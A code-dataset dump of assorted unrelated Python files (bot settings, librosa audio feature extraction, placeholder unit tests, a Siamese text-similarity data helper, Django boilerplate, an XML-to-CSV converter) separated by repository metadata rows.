from pydantic import BaseSettings
class Settings(BaseSettings):
DEBUG: bool
BASE_DIR: Path = Path(__file__).resolve().parent
BOT_TOKEN: str
BOT_USERNAME: str
# pass user_id of a user who have
# the administrator priviledges
ADMIN_ID: int = 0
# pass the chat_id of a chat
# where all exceptions will be sent
ERROR_CHAT_ID: int = 0
PG_HOST: str = ''
PG_USER: str = ''
PG_PASSWORD: str = ''
PG_DATABASE: str = ''
PG_PORT: int = 5432
REDIS_HOST: str = ''
REDIS_PORT: int = 6937
class Config:
env_file = '.env'
env_file_encoding = 'utf-8'
settings = Settings()
| [
"abagraynov@cindicator.com"
] | abagraynov@cindicator.com |
83e063a335e91ced911cc90c1c947aaf1fdf0573 | 100e4f1cec1816249862ac3284ac0b98c549827d | /formants_pitch.py | a30271bbc84c432b9b49fa32a873cacb1dae0e4e | [] | no_license | shrutikshirsagar/Sound_recognition | 59adefce65e9eb41f4e1f01bbf4475de39076e81 | c0181a0d8b86f3b8322afa5272c3a16962ce7cc4 | refs/heads/main | 2023-03-12T11:37:52.051127 | 2021-03-02T19:00:27 | 2021-03-02T19:00:27 | 316,301,735 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,855 | py | import matplotlib.pyplot as plt
import librosa
import numpy as np
import librosa.display
from surfboard.sound import Waveform
import numpy as np
import os
import pandas as pd
path = '//media/shruti/Data/Internship_data/Experiment/Indoor_16Khz/Fire_alarm/'
final_f = np.empty((0, 35))
for f in os.listdir(path):
filename = os.path.join(path,f)
print(filename)
y, sr = librosa.load(filename, sr=None)
# try:
# y = np.asarray(y)
# if y.shape[1] == 2:
# y = np.mean(y, axis=1)
# except:
# y = y
# try:
# if y.shape[1] == 2:
# continue
# except:
# y = y
print(y.shape)
sound = Waveform(path=filename, sample_rate=44100)
## F1 F2 F3 F4
formants = sound.formants()
F1 = np.asarray([formants['f1']])
F1 = F1[:,None]
F2 = np.asarray([formants['f2']])
F2 = F2[:,None]
F3 = np.asarray([formants['f3']])
F3 = F3[:,None]
F4 = np.asarray([formants['f4']])
F4 = F4[:,None]
#### statistics over harmonics
### F1/F2
H1 = F2 - F1
### F1/F3
H2 = F3-F1
### F1/F4
H3 = F4 - F1
### F2/F3
H4 = F3 - F2
###F2/F4
H5 = F4 - F2
### F3/F4
H6 = F4 - F3
### stratistics over F0
### F0
# f0_contour = sound.f0_contour()
# print(f0_contour)
pitches, magnitudes = librosa.core.piptrack(y=y, sr=sr, fmin=75, fmax=5000)
F0 = pitches[np.nonzero(pitches)]
# np.set_printoptions(threshold=np.nan)
F0 = F0[:, None]
## mean
mean_F0 = np.mean(F0, axis = 0)
mean_F0 = mean_F0[:,None]
print(mean_F0)
## std dev
std_F0 = np.std(F0, axis = 0)
std_F0 = std_F0[:,None]
print(std_F0)
## min
min_F0 = np.min(F0, axis = 0)
## max
max_F0 = np.max(F0, axis = 0)
## range
range_F0 = max_F0-min_F0
range_F0 = range_F0[:,None]
min_F0 = min_F0[:,None]
print(min_F0)
max_F0 = max_F0[:,None]
print(max_F0)
print(range_F0)
rms_i = librosa.feature.rms(y=y)
### stratistics over Intensity
## mean
mean_rms = np.mean(rms_i, axis = 1)
## std dev
std_rms = np.std(rms_i, axis = 1)
## min
min_rms = np.min(rms_i, axis = 1)
## max
max_rms = np.max(rms_i, axis = 1)
## range
range_rms = max_rms-min_rms
mean_rms = mean_rms[:,None]
std_rms = std_rms[:,None]
min_rms = min_rms[:,None]
max_rms = max_rms[:,None]
range_rms = range_rms[:,None]
### Spectral fetaures
### spectral centroid
cent = librosa.feature.spectral_centroid(y=y, sr=sr)
### spectral bandwidth
## mean
mean_cent = np.mean(cent, axis = 1)
## std dev
std_cent = np.std(cent, axis = 1)
## min
min_cent = np.min(cent, axis = 1)
## max
max_cent = np.max(cent, axis = 1)
## range
range_cent = max_cent-min_cent
mean_cent = mean_cent[:,None]
std_cent = std_cent[:,None]
min_cent = min_cent[:,None]
max_cent = max_cent[:,None]
range_cent = range_cent[:,None]
spec_bw = librosa.feature.spectral_bandwidth(y=y, sr=sr)
### spectral bandwidth
## mean
mean_spec_bw = np.mean(spec_bw, axis = 1)
## std dev
std_spec_bw = np.std(spec_bw, axis = 1)
## min
min_spec_bw = np.min(spec_bw, axis = 1)
## max
max_spec_bw = np.max(spec_bw, axis = 1)
## range
range_spec_bw = max_spec_bw-min_spec_bw
mean_spec_bw = mean_spec_bw[:,None]
std_spec_bw = std_spec_bw[:,None]
min_spec_bw = min_spec_bw[:,None]
max_spec_bw = max_spec_bw[:,None]
range_spec_bw = range_spec_bw[:,None]
S = np.abs(librosa.stft(y))
# contrast = librosa.feature.spectral_contrast(S=S, sr=sr)
# ## mean
# mean_contrast = np.mean(contrast, axis = 1)
# ## std dev
# std_contrast = np.std(contrast, axis = 1)
# ## min
# min_contrast= np.min(contrast, axis = 1)
# ## max
# max_contrast = np.max(contrast, axis = 1)
# ## range
# range_contrast = max_contrast-min_contrast
# mean_contrast = mean_contrast[:,None]
# std_contrast = std_contrast[:,None]
# min_contrast = min_contrast[:,None]
# max_contrast = max_contrast[:,None]
# range_contrast = range_contrast[:,None]
### Spectral skewness
flatness = librosa.feature.spectral_flatness(y=y)
## mean
mean_flatness = np.mean(flatness, axis = 1)
## std dev
std_flatness = np.std(flatness, axis = 1)
## min
min_flatness= np.min(flatness, axis = 1)
## max
max_flatness = np.max(flatness, axis = 1)
## range
range_flatness = max_flatness-min_flatness
mean_flatness = mean_flatness[:,None]
std_flatness = std_flatness[:,None]
min_flatness = min_flatness[:,None]
max_flatness = max_flatness[:,None]
range_flatness = range_flatness[:,None]
print( F1.shape, F2.shape, F3.shape, F4.shape, H1.shape, H2.shape, H3.shape, H4.shape, H5.shape, H6.shape)
print(mean_F0.shape, std_F0.shape, min_F0.shape, max_F0.shape, range_F0.shape)
print(mean_rms.shape, std_rms.shape, min_rms.shape, max_rms.shape, range_rms.shape)
print(mean_cent.shape, std_cent.shape, min_cent.shape, max_cent.shape, range_cent.shape)
print(mean_spec_bw.shape, std_spec_bw.shape, min_spec_bw.shape, max_spec_bw.shape, range_spec_bw.shape)
print(mean_flatness.shape, std_flatness.shape, min_flatness.shape, max_flatness.shape, range_flatness.shape)
feat = np.hstack((F1, F2, F3, F4, H1, H2, H3, H4, H5, H6, mean_F0, std_F0, min_F0, max_F0, range_F0, mean_rms, std_rms, min_rms, max_rms, range_rms, mean_cent, std_cent, min_cent, max_cent, range_cent, mean_spec_bw, std_spec_bw, min_spec_bw, max_spec_bw, range_spec_bw, mean_flatness, std_flatness, min_flatness, max_flatness, range_flatness))
print(feat.shape)
final_f = np.vstack((final_f, feat))
print(final_f.shape)
df=pd.DataFrame(final_f)
df.to_csv('//media/shruti/Data/Internship_data/Experiment/Features/Fire_alarm_proposed_feat.csv',index=None)
### Spectral roll off
# # Approximate maximum frequencies with roll_percent=0.99
# rolloff = librosa.feature.spectral_rolloff(y=y, sr=sr, roll_percent=0.99)
# print(rolloff.shape)
# # Approximate minimum frequencies with roll_percent=0.01
# rolloff_min = librosa.feature.spectral_rolloff(y=y, sr=sr, roll_percent=0.01)
# print(rolloff_min.shape)
##polynomial
# p0 = librosa.feature.poly_features(S=S, order=0)
# p1 = librosa.feature.poly_features(S=S, order=1)
# p2 = librosa.feature.poly_features(S=S, order=2)
# ## zero crossing rate
# ZCR = librosa.feature.zero_crossing_rate(y)
# print(ZCR.shape)
| [
"noreply@github.com"
] | shrutikshirsagar.noreply@github.com |
de74f08ba22e102abd028cba79653660050c469f | 956eb591c3a348047eae942f49d5e3867543552b | /pythonProject/venv/bin/easy_install | c11636af01c7452a5f5d49f3aeac8f8b9c7500c0 | [] | no_license | Diengoumar/stagemam5 | 481bde82a6e53980378b4edf57950162546ea1dc | a4413a04a2fe946727268700af3a81abd1e21feb | refs/heads/main | 2023-08-18T07:58:35.645481 | 2021-10-08T07:43:13 | 2021-10-08T07:43:13 | 402,440,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | #!/home/ubuntu/PycharmProjects/pythonProject/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"oumardieng91@hotmail.fr"
] | oumardieng91@hotmail.fr | |
537360fd185be8ed174625faa99bbb9e72b1f109 | df3c32e5ed8dab63b75c4177e8795fbccba4e294 | /test/test_pythoscope_util.py | 02519409de2463aeede687bb76da44973d2e6c3b | [
"MIT",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | h4ck3rm1k3/pythoscope | 494245fcf7d4e4f3ab4ddc09b9fe3a6559e69a0c | 0cefb34b86e2e81e29c0b93d27e3d4657db79912 | refs/heads/master | 2021-01-09T06:37:47.534212 | 2014-01-18T12:45:02 | 2014-01-18T12:45:02 | 15,382,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,179 | py | import unittest
class TestCompact(unittest.TestCase):
def test_compact(self):
# self.assertEqual(expected, compact(lst))
assert False # TODO: implement your test here
class TestCounted(unittest.TestCase):
def test_counted(self):
# self.assertEqual(expected, counted(objects))
assert False # TODO: implement your test here
class TestCamelize(unittest.TestCase):
def test_camelize(self):
# self.assertEqual(expected, camelize(name))
assert False # TODO: implement your test here
class TestUnderscore(unittest.TestCase):
def test_underscore(self):
# self.assertEqual(expected, underscore(name))
assert False # TODO: implement your test here
class TestPluralize(unittest.TestCase):
def test_pluralize(self):
# self.assertEqual(expected, pluralize(word, count))
assert False # TODO: implement your test here
class TestString2id(unittest.TestCase):
def test_string2id(self):
# self.assertEqual(expected, string2id(string))
assert False # TODO: implement your test here
class TestString2filename(unittest.TestCase):
def test_string2filename(self):
# self.assertEqual(expected, string2filename(string))
assert False # TODO: implement your test here
class TestFileMode(unittest.TestCase):
def test_file_mode(self):
# self.assertEqual(expected, file_mode(base, binary))
assert False # TODO: implement your test here
class TestReadFileContents(unittest.TestCase):
def test_read_file_contents(self):
# self.assertEqual(expected, read_file_contents(filename, binary))
assert False # TODO: implement your test here
class TestWriteContentToFile(unittest.TestCase):
def test_write_content_to_file(self):
# self.assertEqual(expected, write_content_to_file(string, filename, binary))
assert False # TODO: implement your test here
class TestAllOfType(unittest.TestCase):
def test_all_of_type(self):
# self.assertEqual(expected, all_of_type(objects, type))
assert False # TODO: implement your test here
class TestMaxByNotZero(unittest.TestCase):
def test_max_by_not_zero(self):
# self.assertEqual(expected, max_by_not_zero(func, collection))
assert False # TODO: implement your test here
class TestGetNames(unittest.TestCase):
def test_get_names(self):
# self.assertEqual(expected, get_names(objects))
assert False # TODO: implement your test here
class TestMapValues(unittest.TestCase):
def test_map_values(self):
# self.assertEqual(expected, map_values(function, dictionary))
assert False # TODO: implement your test here
class TestEnsureDirectory(unittest.TestCase):
def test_ensure_directory(self):
# self.assertEqual(expected, ensure_directory(directory))
assert False # TODO: implement your test here
class TestGetLastModificationTime(unittest.TestCase):
def test_get_last_modification_time(self):
# self.assertEqual(expected, get_last_modification_time(path))
assert False # TODO: implement your test here
class TestStartsWithPath(unittest.TestCase):
def test_starts_with_path(self):
# self.assertEqual(expected, starts_with_path(path, prefix))
assert False # TODO: implement your test here
class TestExtractSubpath(unittest.TestCase):
def test_extract_subpath(self):
# self.assertEqual(expected, extract_subpath(path, prefix))
assert False # TODO: implement your test here
class TestDirectoriesUnder(unittest.TestCase):
def test_directories_under(self):
# self.assertEqual(expected, directories_under(path))
assert False # TODO: implement your test here
class TestFindfirst(unittest.TestCase):
def test_findfirst(self):
# self.assertEqual(expected, findfirst(pred, seq))
assert False # TODO: implement your test here
class TestFlatten(unittest.TestCase):
def test_flatten(self):
# self.assertEqual(expected, flatten(lst))
assert False # TODO: implement your test here
class TestUnion(unittest.TestCase):
def test_union(self):
# self.assertEqual(expected, union(*sets))
assert False # TODO: implement your test here
class TestKeyForValue(unittest.TestCase):
def test_key_for_value(self):
# self.assertEqual(expected, key_for_value(dictionary, value))
assert False # TODO: implement your test here
class TestGetGeneratorFromFrame(unittest.TestCase):
def test_get_generator_from_frame(self):
# self.assertEqual(expected, get_generator_from_frame(frame))
assert False # TODO: implement your test here
class TestIsGeneratorCode(unittest.TestCase):
def test_is_generator_code(self):
# self.assertEqual(expected, is_generator_code(code))
assert False # TODO: implement your test here
class TestGeneratorHasEnded(unittest.TestCase):
def test_generator_has_ended(self):
# self.assertEqual(expected, generator_has_ended(generator))
assert False # TODO: implement your test here
class TestIsMethodWrapper(unittest.TestCase):
def test_is_method_wrapper(self):
# self.assertEqual(expected, is_method_wrapper(obj))
assert False # TODO: implement your test here
class TestGetSelfFromMethod(unittest.TestCase):
def test_get_self_from_method(self):
# self.assertEqual(expected, get_self_from_method(method))
assert False # TODO: implement your test here
class TestCompileWithoutWarnings(unittest.TestCase):
def test_compile_without_warnings(self):
# self.assertEqual(expected, compile_without_warnings(stmt))
assert False # TODO: implement your test here
class TestCallersName(unittest.TestCase):
def test_callers_name(self):
# self.assertEqual(expected, callers_name())
assert False # TODO: implement your test here
class TestTypeNames(unittest.TestCase):
def test_type_names(self):
# self.assertEqual(expected, type_names(types))
assert False # TODO: implement your test here
class TestAssertArgumentType(unittest.TestCase):
def test_assert_argument_type(self):
# self.assertEqual(expected, assert_argument_type(obj, expected_type))
assert False # TODO: implement your test here
class TestQuotedBlock(unittest.TestCase):
def test_quoted_block(self):
# self.assertEqual(expected, quoted_block(text))
assert False # TODO: implement your test here
class TestClassOf(unittest.TestCase):
def test_class_of(self):
# self.assertEqual(expected, class_of(obj))
assert False # TODO: implement your test here
class TestClassName(unittest.TestCase):
def test_class_name(self):
# self.assertEqual(expected, class_name(obj))
assert False # TODO: implement your test here
class TestModuleName(unittest.TestCase):
def test_module_name(self):
# self.assertEqual(expected, module_name(obj))
assert False # TODO: implement your test here
class TestModulePathToName(unittest.TestCase):
def test_module_path_to_name(self):
# self.assertEqual(expected, module_path_to_name(module_path, newsep))
assert False # TODO: implement your test here
class TestLastTraceback(unittest.TestCase):
def test_last_traceback(self):
# self.assertEqual(expected, last_traceback())
assert False # TODO: implement your test here
class TestLastExceptionAsString(unittest.TestCase):
def test_last_exception_as_string(self):
# self.assertEqual(expected, last_exception_as_string())
assert False # TODO: implement your test here
class TestRegexpFlagsAsString(unittest.TestCase):
def test_regexp_flags_as_string(self):
# self.assertEqual(expected, regexp_flags_as_string(flags))
assert False # TODO: implement your test here
class TestLoadPickleFrom(unittest.TestCase):
def test_load_pickle_from(self):
# self.assertEqual(expected, load_pickle_from(path))
assert False # TODO: implement your test here
if __name__ == '__main__':
unittest.main()
| [
"jamesmikedupont@gmail.com"
] | jamesmikedupont@gmail.com |
f8a9873f17233f7490661e29d2e14c7adf1359b9 | 5bbf56dec57fdba4b6c32d679d8216fd2c364eb2 | /datastruct/dictsort.py | 8fb59915a1c2efed40ae9c2070a78e5cbc2754de | [] | no_license | yiwenzi/python | 394d5b744422e33409145bcc0245774e8c0d1933 | 56c1f2ea710514a36daf0b314ad36abbc9b0444e | refs/heads/master | 2020-03-12T08:10:40.552943 | 2018-04-24T14:54:37 | 2018-04-24T14:54:37 | 130,521,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | # coding=utf-8
from random import randint
__author__ = 'hunter'
d = {x: randint(60, 100) for x in 'abcdefg'}
# 直接排序,是按key来排序的
print sorted(d)
# 使用zip函数,重新构造dict
d2 = sorted(zip(d.itervalues(), d.iterkeys()))
print d2
# 传入匿名函数,控制排序使用的值
d3 = sorted(d.items(), key=lambda x: x[1])
print d3
| [
"hello.jiajun@qq.com"
] | hello.jiajun@qq.com |
f5242073f0bfa465e975bd513bb740d7394140f9 | 6d287cd00d4df706f0e0d93f21c49be9632312cf | /Weekly-Contest/215/5603-Determine-if-Two-Strings-Are-Close.py | 3806f2eae68e258ce3d412b38ac1301891c06cae | [] | no_license | csyhhu/LeetCodePratice | eba799a3b74b6ef7b011bf1500c386ce37be6de9 | 9366805ba480bb234d6bc63cea098b6e41539d35 | refs/heads/master | 2023-07-10T22:51:58.908904 | 2023-06-21T02:46:07 | 2023-06-21T02:46:07 | 204,811,835 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,178 | py | def closeStrings(word1: str, word2: str):
"""
1) Swap any two existing characters
2) Transform every occurrence of one existing character into another existing character, and do the same with the other character.
:param word1:
:param word2:
:return:
"""
if len(word1) != len(word2):
return False
word1_dict = dict()
for c in word1:
if c in word1_dict:
word1_dict[c] += 1
else:
word1_dict[c] = 1
word2_dict = dict()
for c in word2:
if c in word2_dict:
word2_dict[c] += 1
else:
word2_dict[c] = 1
if len(word1_dict) != len(word2_dict):
return False
if set(word1_dict.keys()) != set(word2_dict.keys()):
return False
for start, n_start in word1_dict.items():
for end, n_end in word2_dict.items():
if n_start == n_end:
word2_dict.pop(end)
break
if len(word2_dict) == 0:
return True
else:
return False
# word1 = "cabbba"
# word2 = "abbccc"
# print(closeStrings(word1, word2))
word1 = "usu"
word2 = "aax"
print(closeStrings(word1, word2)) | [
"schen025@e.ntu.edu.sg"
] | schen025@e.ntu.edu.sg |
948699f4f43166001accf08ca41b50bc491cccb7 | 4d363dff48515c6a00ca78903ff2e824c64e9098 | /qaPairsRelationClassification/DeepSiameseNet/utils/input_helpers.py | e28194f26a01ff475a95a0cea636ef7fccef480a | [
"Apache-2.0",
"MIT"
] | permissive | lrpopeyou/pynlp | 3b0e0d54be87d7de0b447f6b6e0e1b801adb1012 | 0f1aa73f8c4bd3faba18dbb6e402d251e308bb50 | refs/heads/master | 2022-04-05T17:55:22.511021 | 2019-12-13T09:54:27 | 2019-12-13T09:54:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,582 | py | import gc
import warnings
from random import random
import numpy as np
from utils.preprocess import MyVocabularyProcessor
class InputHelper(object):
pre_emb = dict()
vocab_processor = None
def getVocab(self, vocab_path, max_document_length, filter_h_pad):
if self.vocab_processor is None:
print('locading vocab_')
vocab_processor = MyVocabularyProcessor(max_document_length - filter_h_pad, min_frequency=0)
self.vocab_processor = vocab_processor.restore(vocab_path)
return self.vocab_processor
def deletePreEmb(self):
self.pre_emb = dict()
gc.collect()
def getTsvData(self, filepath):
print("Loading training data from " + filepath)
x1 = []
x2 = []
y = []
# positive samples from file
for line in open(filepath):
l = line.strip().split("\t")
if len(l) < 2:
continue
if random() > 0.5:
x1.append(l[0].lower())
x2.append(l[1].lower())
else:
x1.append(l[1].lower())
x2.append(l[0].lower())
y.append(int(l[2]))
return np.asarray(x1), np.asarray(x2), np.asarray(y)
def getTsvDataCharBased(self, filepath):
print("Loading training data from " + filepath)
x1 = []
x2 = []
y = []
x1_negative = []
x2_negative = []
y_negative = []
# positive samples from file
for line in open(filepath, encoding="utf-8"):
l = line.strip().split("\t")
if len(l) != 3:
print(l)
continue
if l[2] == "0":
x1_negative.append(l[0].lower())
x2_negative.append(l[1].lower())
y_negative.append(l[2])
if random() > 0.5:
x1.append(l[0].lower())
x2.append(l[1].lower())
y.append(l[2]) # np.array([0,1]))
else:
x1.append(l[1].lower())
x2.append(l[0].lower())
y.append(l[2]) # np.array([0,1]))
# generate random negative samples
# combined = np.asarray(x1 + x2)
# shuffle_indices = np.random.permutation(np.arange(len(combined)))
# combined_shuff = combined[shuffle_indices]
# for i in range(len(combined)):
# x1.append(combined[i])
# x2.append(combined_shuff[i])
# y.append(0) # np.array([1,0]))
# for i in range(len(x1_negative)):
# x1.append(x1_negative[i])
# x2.append(x2_negative[i])
# y.append(y_negative[i])
return np.asarray(x1), np.asarray(x2), np.asarray(y)
def getTsvTestData(self, filepath):
print("Loading testing/labelled data from " + filepath)
x1 = []
x2 = []
y = []
# positive samples from file
for line in open(filepath, encoding="utf-8"): # , encoding="utf-8"
l = line.strip().split("\t")
if len(l) < 3:
continue
x1.append(l[1].lower())
x2.append(l[2].lower())
y.append(int(l[0])) # np.array([0,1]))
return np.asarray(x1), np.asarray(x2), np.asarray(y)
def batch_iter(self, data, batch_size, num_epochs, shuffle=True):
"""
Generates a batch iterator for a dataset.
"""
data = np.asarray(data)
data_size = len(data)
num_batches_per_epoch = int(len(data) / batch_size) + 1
for epoch in range(num_epochs):
# Shuffle the data at each epoch
if shuffle:
shuffle_indices = np.random.permutation(np.arange(data_size))
shuffled_data = data[shuffle_indices]
else:
shuffled_data = data
for batch_num in range(num_batches_per_epoch):
start_index = batch_num * batch_size
end_index = min((batch_num + 1) * batch_size, data_size)
yield shuffled_data[start_index:end_index]
def dumpValidation(self, x1_text, x2_text, y, shuffled_index, dev_idx, i):
print("dumping dev " + str(i))
x1_shuffled = x1_text[shuffled_index]
x2_shuffled = x2_text[shuffled_index]
y_shuffled = y[shuffled_index]
x1_dev = x1_shuffled[dev_idx:]
x2_dev = x2_shuffled[dev_idx:]
y_dev = y_shuffled[dev_idx:]
del x1_shuffled
del y_shuffled
with open('F:\python_work\siamese-lstm-network\deep-siamese-text-similarity\\atec_data\dev.txt', 'w', encoding="utf-8") as f:
for text1, text2, label in zip(x1_dev, x2_dev, y_dev):
f.write(str(label) + "\t" + text1 + "\t" + text2 + "\n")
f.close()
del x1_dev
del y_dev
# Data Preparatopn
# ==================================================
def getDataSets(self, training_paths, max_document_length, percent_dev, batch_size):
x1_text, x2_text, y = self.getTsvDataCharBased(training_paths)
# Build vocabulary
print("Building vocabulary")
vocab_processor = MyVocabularyProcessor(max_document_length, min_frequency=0)
vocab_processor.fit_transform(np.concatenate((x2_text, x1_text), axis=0))
f = open("./voc", "w",encoding="utf-8")
for i in range(len(vocab_processor.vocabulary_)):
f.write(vocab_processor.vocabulary_.reverse(i)+"\n")
print("Length of loaded vocabulary ={}".format(len(vocab_processor.vocabulary_)))
sum_no_of_batches = 0
x1 = np.asarray(list(vocab_processor.transform(x1_text)))
x2 = np.asarray(list(vocab_processor.transform(x2_text)))
# Randomly shuffle data
np.random.seed(131)
shuffle_indices = np.random.permutation(np.arange(len(y)))
x1_shuffled = x1[shuffle_indices]
x2_shuffled = x2[shuffle_indices]
y_shuffled = y[shuffle_indices]
dev_idx = -1 * len(y_shuffled) * percent_dev // 100
del x1
del x2
# Split train/test set
self.dumpValidation(x1_text, x2_text, y, shuffle_indices, dev_idx, 0)
# TODO: This is very crude, should use cross-validation
x1_train, x1_dev = x1_shuffled[:dev_idx], x1_shuffled[dev_idx:]
x2_train, x2_dev = x2_shuffled[:dev_idx], x2_shuffled[dev_idx:]
y_train, y_dev = y_shuffled[:dev_idx], y_shuffled[dev_idx:]
print("Train/Dev split for {}: {:d}/{:d}".format(training_paths, len(y_train), len(y_dev)))
sum_no_of_batches = sum_no_of_batches + (len(y_train) // batch_size)
train_set = (x1_train, x2_train, y_train)
dev_set = (x1_dev, x2_dev, y_dev)
gc.collect()
return train_set, dev_set, vocab_processor, sum_no_of_batches
def getTestDataSet(self, data_path, vocab_path, max_document_length):
x1_temp, x2_temp, y = self.getTsvTestData(data_path)
# Build vocabulary
vocab_processor = MyVocabularyProcessor(max_document_length, min_frequency=0)
vocab_processor = vocab_processor.restore(vocab_path)
# f = open("./vocab_new", "w", encoding="utf-8")
# for i in range(len(vocab_processor.vocabulary_)):
# f.write(vocab_processor.vocabulary_.reverse(i) + "\n")
x1 = np.asarray(list(vocab_processor.transform(x1_temp)))
x2 = np.asarray(list(vocab_processor.transform(x2_temp)))
# Randomly shuffle data
del vocab_processor
gc.collect()
return x1, x2, y
| [
"900326yang"
] | 900326yang |
e7e0b4218728f2b71bc3f8d0aa25460859bac071 | 0345efcc297ac6bd4f4c0010290d10a4d1d19fb8 | /app/migrations/0003_auto_20200926_2236.py | 79a9ffe8cab74852bf6911cbeb2498a4dc013507 | [] | no_license | meat9/rest_bot | 953f412f6ac13a4149424bd5fae53e70c1c0a40b | 6f735a415d4b1a056e89b33b711f4fb7f533a2b2 | refs/heads/master | 2022-12-24T22:04:00.680688 | 2020-10-06T16:54:52 | 2020-10-06T16:54:52 | 298,871,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 675 | py | # Generated by Django 3.1.1 on 2020-09-26 19:36
from django.db import migrations, models
import gsheets.mixins
import uuid
class Migration(migrations.Migration):
dependencies = [
('app', '0002_person'),
]
operations = [
migrations.CreateModel(
name='Test',
fields=[
('guid', models.CharField(default=uuid.uuid4, max_length=255, primary_key=True, serialize=False)),
('test_field', models.CharField(max_length=127)),
],
bases=(gsheets.mixins.SheetSyncableMixin, models.Model),
),
migrations.DeleteModel(
name='Person',
),
]
| [
"iiidonaldiii@gmail.com"
] | iiidonaldiii@gmail.com |
3ecfcd1b407d0620a5577195224b57ab70cc47e6 | 8f6fa264770a48a4bc1563211baa3fda37e2fbfa | /AD_ROI/asgi.py | 6968051c25f067f237205620d09c3cf2c2ac02b1 | [] | no_license | So-fin/Django-ROI-Calculator-Application-Development-Project | 45f1925dfadf9800aedefa3b3d5fa8470a7da0c1 | 41bb6f89e70d0ffd635b0d99f2bc071ded43ac63 | refs/heads/main | 2023-02-12T18:39:04.390427 | 2021-01-10T11:17:53 | 2021-01-10T11:17:53 | 328,362,325 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
ASGI config for AD_ROI project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'AD_ROI.settings')
application = get_asgi_application()
| [
"sofinwadhwaniya18@gnu.ac.in"
] | sofinwadhwaniya18@gnu.ac.in |
7cca7e78bf221433446d462997bcc94b90d386ee | aca539099faaf7532848cfe61aa8dafcaecddea0 | /base/__init__.py | 970590f7517b8aaf5080bda5582a5e532ea04562 | [] | no_license | geo000/MTL_homoscedastic_SRB | 824c37ae23da275af2d993657fb43d92cf548414 | 6137c334d754394b58e007d419f9d699b35bad35 | refs/heads/main | 2023-05-13T00:32:39.883337 | 2021-05-25T08:29:20 | 2021-05-25T08:29:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | from .model import SegmentationModel
from .modules import (
Conv2dReLU,
Attention,
)
from .heads import (
SegmentationHead,
ClassificationHead,
AUX_edgehead,
AUX_SegmentationHead
) | [
"noreply@github.com"
] | geo000.noreply@github.com |
775a116478124bcea5a3d5aabcbc37540ba42801 | c950955296f5989ad9db585af2a87f1d1842395e | /positions_explorer/manage.py | 377a74752f218f145c234d90af92508c39ac785f | [] | no_license | Contexte/eu-hackathon | d6dabdf160846f9d38d81d58d0823122cfc569a7 | ed03aeea75be404dfc56a5fce1d38c594f202f99 | refs/heads/master | 2021-01-22T08:27:47.742154 | 2014-12-03T12:05:16 | 2014-12-03T12:05:22 | 27,421,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "positions_explorer.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"adelaby@contexte.com"
] | adelaby@contexte.com |
bc0eb24f243dcd89f945e8d32010f60e4d419698 | e80a89f5892bb0d0d46b9811b74057ab730e4aca | /xml_to_csv.py | bc75f5bc8871ed4da218d1bcdabc1733690b96c3 | [] | no_license | kaletap/stack | db8984f486acdaa9494606b96cde1ad704b92f8a | e15ada3d148dba1948db24fbb27658bb6e55c662 | refs/heads/master | 2020-04-10T23:59:28.146592 | 2019-02-13T20:03:00 | 2019-02-13T20:19:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,206 | py | #!/usr/bin/env python
import xml.etree.cElementTree as et
import os
import pandas as pd
def save_xml_as_csv(dataset_name):
"""Saves all tables of dataset as csv's"""
data_path = os.path.join("data", dataset_name + ".stackexchange.com")
if not os.path.exists(data_path):
print("Check whether path {} exists!".format(data_path))
for table_name in os.listdir(data_path):
table_path = os.path.join(data_path, table_name)
if table_path.endswith('xml'):
# Parsing XML
parsedXML = et.parse(table_path)
root = parsedXML.getroot()
# Saving data frame as a csv
df = pd.DataFrame([row.attrib for row in root])
save_path = os.path.splitext(table_path)[0] + ".csv"
df.to_csv(save_path)
print("Saved {} from {}".format(table_name, dataset_name))
def main():
""" Napisz w argumencie jaki zbiór chcesz przerobić na csv
Dane musza byc wypakowane w folderze data.
Pliki .csv zapisuja sie w folderze gdzie znajduja sie pliki .xml
Moze sie troche mielic."""
save_xml_as_csv("movies")
save_xml_as_csv("writers")
if __name__ == "__main__":
main()
| [
"kaletap@student.mini.pw.edu.pl"
] | kaletap@student.mini.pw.edu.pl |
82e66eb8027f06c7c8b3a2130383eee0433965f7 | 5cc3334518c73a7de57f33a9b79ab4dd38693163 | /test_tf.py | 011ea6bf5e61e9340ac852d40abf25af2693ab64 | [] | no_license | arashdn/sof-expert-finding-ml | 0affecc06db78e96a55c376f65f53aaf780d1e5f | de8f6b64bf666d7d4fa3a6abd24354d7d8000f6f | refs/heads/master | 2021-01-19T18:59:02.731049 | 2018-01-20T11:02:40 | 2018-01-20T11:02:40 | 88,392,949 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,194 | py | # import tensorflow as tf
#
# # v1 = tf.Variable([[1,2,3]], name="v1")
# # v2 = tf.Variable([[4],[5],[6]], name="v2")
# # ...
# # # Add an op to initialize the variables.
# # init_op = tf.global_variables_initializer()
# #
# # # Add ops to save and restore all the variables.
# # saver = tf.train.Saver()
#
# # with tf.Session() as sess:
# # sess.run(init_op)
# # # Do some work with the model.
# # v2 = tf.matmul(v1,v2)
# #
# # # print(v2.eval())
# #
# # # Save the variables to disk.
# # save_path = saver.save(sess, "./model.ckpt")
